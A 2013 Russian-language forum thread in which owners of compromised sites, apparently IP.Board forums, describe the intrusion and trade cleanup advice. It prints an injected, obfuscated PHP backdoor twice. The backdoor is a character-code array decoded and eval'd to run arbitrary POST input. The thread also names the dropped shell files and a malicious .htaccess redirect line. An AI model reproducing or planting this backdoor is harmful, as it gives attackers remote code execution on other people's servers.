wp-conf.php взлом?

[HooLIGUN]

Привет всем.Сегодня приехал домой,зашел на свои сайты,и на одном из них была ошибка

Notice: Use of undefined constant w1111t - assumed 'w1111t' in /var/www/data/www/bans.rgmix.eu/config.php on line 1

Решил заглянуть в этот файл и увидел строчку

    if(isset($_GET[w1111t])){                                                                                                                                        $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);                                                                                                                                                                                }    

Ладно.

Также на некоторых сайтах появился файл wp-conf.php с содержанием:  код слишком большой,прикреплю файл

wp-conf.php

Файл был загружен сегодня 3 часа назад...

Что это такое?

И как с этим бороться???

upd#:

На всех сайтах в конфигурационных файлах (на разных сайтах) добавлена подобная строчка и лежит этот файл wp-conf.php (аваст на него ругается)

	if(isset($_GET[w9345t])){																																		$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);																																												}																					

Изменено 9 марта, 2013 пользователем HooLIGUN

[Respected]

Да, это взлом. Скорее всего взломали FTP аккаунт. Срочно меняй все пароли. Используй SFTP для соединения с сервером. Проверь комп на вирусы.

[HooLIGUN]

Используй SFTP для соединения с сервером.

Только им и пользуюсь.

Сейчас буду менять.

А не подскажешь где можно посмотреть логи?

А то я незнаю где они находятся на vds`e

[HooLIGUN]

Теперь зараженные файлы еще искать...

[Respected]

/var/log/apache2

[HooLIGUN]

/var/log/apache2

Эх..тут ничего не нашел...

[HooLIGUN]

 Нашел логи в папке с юзера (меня)

31.133.47.233 Вот эта тварь ко мне ломилась

Ух я зол 

 

[Respected]

В этом случае ничего со злоумышленником не поделать, меняй пароли и устраняй последствия взлома..

[HooLIGUN]

О даа...Опять подобные файлы лежат в корнях сайтов...

Пол часа назад залитые...еще сделать ничего не успели видимо...

Как так? Пароли везде были сгенерированны.

Где то есть дырка,но как ее найти?

Явно по фтп юзера заходят,т.к ниже этого /var/www/hooligun/data каталога у них доступа нет...

Изменено 13 марта, 2013 пользователем HooLIGUN

[€ WinsanT]

Может тогда лучше написать хостеру ? Чтобы блоканули доступ к фтп по IP ? 

 

Или пускай они у себя ищут дыры... 

[Respected]

Самый верный способ - открыть доступ на сервер с одного IP.

[YND]

Есть форум пока не развивающийся, зашел на хост дабы залить файл и заметил что-то непривычное.. 

В корне сайта файлы wp-conf.php, wp-kvwotp.php, wp-skrxzqc.php и несколько других.

Также изменен .htaccess:

ErrorDocument 404 /wp-kvwotp.php

 

Также в корне папка .zz

В ней несколько файлов с рандомными названия содержанием :

O:8:"stdClass":3:{s:6:"status";s:22:"HTTP/1.1 404 Not Found";s:11:"contentType";s:10:" text/html";s:7:"content";s:570:"<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.2.7</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
";}

 

И файлы pollIria.php, Qpoll.php, schedulexDq.php, Rlogoff.php

Последний похож на Shell (раньше shell'ов никогда не видел, поэтому могу ошибаться..).

 

Так как форум сейчас простаивает, то файлы с февраля не изменялись и я все мартовские файлы удалил, но "он" опять их залил..

Что больше всего меня пугает - wp-conf.php был у меня в самом корне хостинга..

 

Все мартовские файлы удалил, пока вроде бы чисто.. Сейчас пароли сменю..

[Respected]

Нужно всегда обновляться до последней версии. Не один раз об этом говорили.

[sanello]

Видел такое на сайтах одного клиента, удалил все файлы кроме контента пользователей, вычистил все оставшиеся php файлы и обновил форум (вирусятина встречалась почти в каждой папке а также была втроена в некоторые файлы, например в файл конфига)

[Death1]

Нашел логи в папке с юзера (меня)

31.133.47.233 Вот эта тварь ко мне ломилась

Снимок.PNG

Ух я зол 

Некоторые дыры закрываются путём обновления форума. Может всётаки пришло и твоё время? 3.3 давно ведь не актуальная версия.

 

Respected: правильно ведь?

[Respected]

Да, для 3.3.x уже шелл давно в сети появился.

[HooLIGUN]

Death1, Да я уже обновился.

[Niyazaliev.kai]

Здравствуйте, у меня такая же проблема была и есть, уже давно мучает, хостер блокирует форум из-за этого а вычищаю все что могу, они включают и все заного по кругу, потом думал что поможет обновление, 3.2.3 у меня, но связи с тем что с базой не получилось при установке последней версии, пришлось опять ту же самую ставить, но вопрос тут по БД не сюда наверное.

 

я так понимаю, проблему это решить можно только с обновлением?

[HooLIGUN]

Здравствуйте, у меня такая же проблема была и есть, уже давно мучает, хостер блокирует форум из-за этого а вычищаю все что могу, они включают и все заного по кругу, потом думал что поможет обновление, 3.2.3 у меня, но связи с тем что с базой не получилось при установке последней версии, пришлось опять ту же самую ставить, но вопрос тут по БД не сюда наверное.

 

я так понимаю, проблему это решить можно только с обновлением?

Решил проблему (Ну по крайней мере теперь все нормально) отключив пользователю доступ к Shell

[Niyazaliev.kai]

Решил проблему (Ну по крайней мере теперь все нормально) отключив пользователю доступ к Shell

Вы это сделали посредством htacess? можете ваш код мне дать у меня вообще щас этого файла нету в корневой директории

[HooLIGUN]

Вы это сделали посредством htacess? можете ваш код мне дать у меня вообще щас этого файла нету в корневой директории

Я это сделал в панеле ISPManager

 

[eeadlo]

Такая же фигня наблюдается.
Хостуюсь на бесплатном хостинге, который не в первый раз блокирует мне аккаунт из-за такого скрипта.
Он мне конкретно засрал корень, залив туда всякие-разные папки

[Respected]

Бесплатного хостинга сторожиться надо, а не сидеть на нём

[eeadlo]

Это из-за shell'а в версии ip.board, как я понимаю?

Нужно обновляться?

[HooLIGUN]

eeadlo,Нужно всегда обновляться до актуальной версии.